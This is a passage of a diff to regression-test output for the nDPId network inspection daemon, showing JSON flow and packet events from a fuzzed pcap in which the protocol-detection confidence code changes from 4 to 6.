00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":476,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470670573,"flow_last_seen":1120470670573,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470670573,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.37.115","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":1120470670573,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470670573,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFEABOXMsAAIARWVvAqAEpwKglcwCJAIkAOmUbkVcBEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJPAAAgAAE="} 
-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":476,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470670573,"flow_last_seen":1120470670573,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470670573,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.37.115","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":479,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470490782,"flow_last_seen":1120470490782,"flow_idle_time":200000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1120470672075,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.37.115.0","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":476,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470670573,"flow_last_seen":1120470670573,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470670573,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.37.115","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":479,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470490782,"flow_last_seen":1120470490782,"flow_idle_time":200000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1120470672075,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.37.115.0","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":479,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470490640,"flow_last_seen":1120470490640,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470672075,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2790,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":479,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470492042,"flow_last_seen":1120470492042,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470672075,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":479,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470491041,"flow_last_seen":1120470491041,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470672075,"l3_proto":"ip4","src_ip":"192.168.79.2","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -929,80 +929,80 @@ 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":480,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":1120470684859,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470684859,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOa4UAAIARSsjAqAECwKiqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":481,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470685610,"flow_last_seen":1120470685610,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470685610,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":481,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":1,"flow_last_seen":1120470685610,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470685610,"pkt":"\/\/\/\/\/\/\/\/AODtA269CABFAABOa4YAAIARTsfAqAECyKgB\/wCJAIkAOltWhUUBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="} 
-00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470685610,"flow_last_seen":1120470685610,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470685610,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470685610,"flow_last_seen":1120470685610,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470685610,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00618{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":482,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470495627,"flow_last_seen":1120470495627,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470685610,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00603{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":482,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470495627,"flow_last_seen":1120470495627,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470685610,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":482,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470494127,"flow_last_seen":1120470494127,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470685610,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.194.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":482,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470494127,"flow_last_seen":1120470494127,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470685610,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.194.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":482,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470501450,"flow_last_seen":1120470501450,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470685610,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.67.1","src_port":2791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":482,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470496048,"flow_last_seen":1120470496048,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470685610,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":482,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1120469540839,"flow_last_seen":1120470684110,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":2592,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1120470685610,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
+00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":482,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1120469540839,"flow_last_seen":1120470684110,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":2592,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1120470685610,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":484,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470717078,"flow_last_seen":1120470717078,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1120470717078,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00853{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":484,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":1120470717078,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1120470717078,"pkt":"ADBUADRWAODtAW69CABFAAFIa4cAAIARSsrAqAECwKgBAQBEAEMBNA+RAQEGAAZtDDgAAAAAwKgBAgAAAAAAAAAAAAAAAN\/g7QFuvQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADUAAAAAAAAAAAAAAAAAAAAAYQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANABjglNjNQEDPQcBAODtAW69DAdkMDAyNDY1UQsAAABkMDAyNDY1LjwITVNGVCA1LjA3CgEPAwYsLi8fISv\/AAAA"} -00750{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":484,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470717078,"flow_last_seen":1120470717078,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1120470717078,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"d002465","fingerprint":"1,15,3,6,44,46,47,31,33,43","class_ident":"MSFT 5.0"}} 
+00750{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":484,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470717078,"flow_last_seen":1120470717078,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1120470717078,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"d002465","fingerprint":"1,15,3,6,44,46,47,31,33,43","class_ident":"MSFT 5.0"}} 01186{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":2,"flow_last_seen":1120470717080,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":590,"pkt_l4_len":556,"thread_ts_msec":1120470717080,"pkt":"AODtAW69ADBUADRWCABFAAJAAAAAAEAR9VnAqAEBwKgBAgBDAEQCLJ6VAgEGAAZtDDgAAAAAwKgBAsCoAQIAAAAAAAAAAADg7QFuvQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABv2gAAAAAAAAAA0QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEFNgTAqAEBMwQAAA4QDAdkMDAyNDY1AQT\/9\/8AAwTAqAEBBgTAqAEB\/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAFAAAAA="} 
00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470721915,"flow_last_seen":1120470721915,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120470721915,"l3_proto":"ip4","src_ip":"192.168.1.41","dst_ip":"192.168.1.255","src_port":138,"dst_port":394,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00729{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":1,"flow_last_seen":1120470721915,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1120470721915,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCABFAADlXM4AAIARWMHAqAEpwKgB\/wCKAYoA0YerEQJM2MCoASkAigC7AAAghU1FQkVDREJEQkRCQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0EAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAOgDAAAAAABGAAAhAFYAAwABAAAAAgAyAFxNQUlMU0xPVFxCUk9XbkUAAQCA\/AoATEFCMTExAAAAAAAAAAAAAAUBAxAAAA8BVaoA"} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":487,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1120469572981,"flow_last_seen":1120470509450,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":11994,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":1120470721915,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":487,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1120469572981,"flow_last_seen":1120470509450,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":11994,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":1120470721915,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":487,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470509447,"flow_last_seen":1120470509447,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470721915,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2792,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":487,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470509449,"flow_last_seen":1120470509449,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470721915,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"240.168.1.2","src_port":53,"dst_port":2792,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": 
{"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":487,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470509449,"flow_last_seen":1120470509449,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470721915,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"240.168.1.2","src_port":53,"dst_port":2792,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":487,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470114910,"flow_last_seen":1120470114910,"flow_idle_time":620000,"flow_min_l4_payload_len":383,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":383,"midstream":0,"thread_ts_msec":1120470721915,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","l4_proto":118,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00565{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":487,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470114910,"flow_last_seen":1120470114910,"flow_idle_time":620000,"flow_min_l4_payload_len":383,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":383,"midstream":0,"thread_ts_msec":1120470721915,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","l4_proto":118,"flow_datalink":1,"flow_max_packets":3} 00583{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":490,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","packets-captured":490,"packets-processed":409,"total-skipped-flows":0,"total-l4-payload-len":39786,"total-not-detected-flows":16,"total-guessed-flows":10,"total-detected-flows":134,"total-detection-updates":55,"total-updates":22,"current-active-flows":40,"total-active-flows":189,"total-idle-flows":149,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":950,"global_ts_msec":1120470764674} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":490,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470764674,"flow_last_seen":1120470764674,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120470764674,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":490,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":1,"flow_last_seen":1120470764674,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120470764674,"pkt":"ADBUADRWQODtAW69CABFAAA+a48AAIARS8zAqAECwKgBAQrpADUAKoUz6OwBAAABAAAAAAAAA3JlLQhzaXBwc3RhcgNjb20AAAEAAQ=="} 